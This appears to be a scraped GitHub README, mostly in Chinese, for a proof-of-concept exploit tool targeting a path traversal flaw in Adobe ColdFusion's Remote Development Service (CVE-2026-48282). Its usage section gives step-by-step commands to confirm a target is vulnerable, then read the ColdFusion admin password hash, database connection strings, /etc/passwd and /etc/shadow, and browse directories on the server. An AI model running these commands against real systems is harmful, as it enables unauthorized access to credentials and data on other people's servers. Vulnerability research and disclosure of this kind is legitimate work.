imbas007/CVE-2026-48282

GitHub: imbas007/CVE-2026-48282

针对 Adobe ColdFusion RDS 路径遍历漏洞(CVE-2026-48282)的 PoC 利用工具,支持漏洞检测、任意文件读取和目录浏览。

Stars: 20 | Forks: 5

# CVE-2026-48282-POC **CVE-2026-48282** 是 **Adobe ColdFusion 的 Remote Development Service (RDS)** 中的一个**路径遍历**漏洞,其 CVSS 评分为 **10.0(严重)**。它允许未经身份验证的攻击者通过 `/CFIDE/main/ide.cfm` endpoint 读取和写入任意文件,从而导致**远程代码执行 (RCE)**。 ## 安装说明 ``` # Clone the repository git clone https://github.com//CVE-2026-48282.git cd CVE-2026-48282 # 安装 dependencies(仅需要 `requests`) pip install -r requirements.txt ``` # 使用方法 ### 步骤 1 — 检查目标是否存在漏洞 ``` python cve-2026-48282.py -t http://target.com --check ``` ``` ### 步骤 2 — 读取敏感文件 Once confirmed vulnerable, extract credentials and configuration: ```bash # ColdFusion admin password hash python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties" # Database connection strings (neo-query.xml) python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml" # Linux targets python cve-2026-48282.py -t https://target.com --read /etc/passwd python cve-2026-48282.py -t https://target.com --read /etc/shadow # 保存输出到文件 python cve-2026-48282.py -t http://target.com --read "C:\\boot.ini" -o boot.ini ``` ### 步骤 3 — 浏览目录 ``` # 列出 root directory python cve-2026-48282.py -t http://target.com --browse "C:\\" ``` image
标签:CISA项目, HTTP工具, PoC, Python, 无后门, 暴力破解, 网络安全审计, 路径遍历, 逆向工具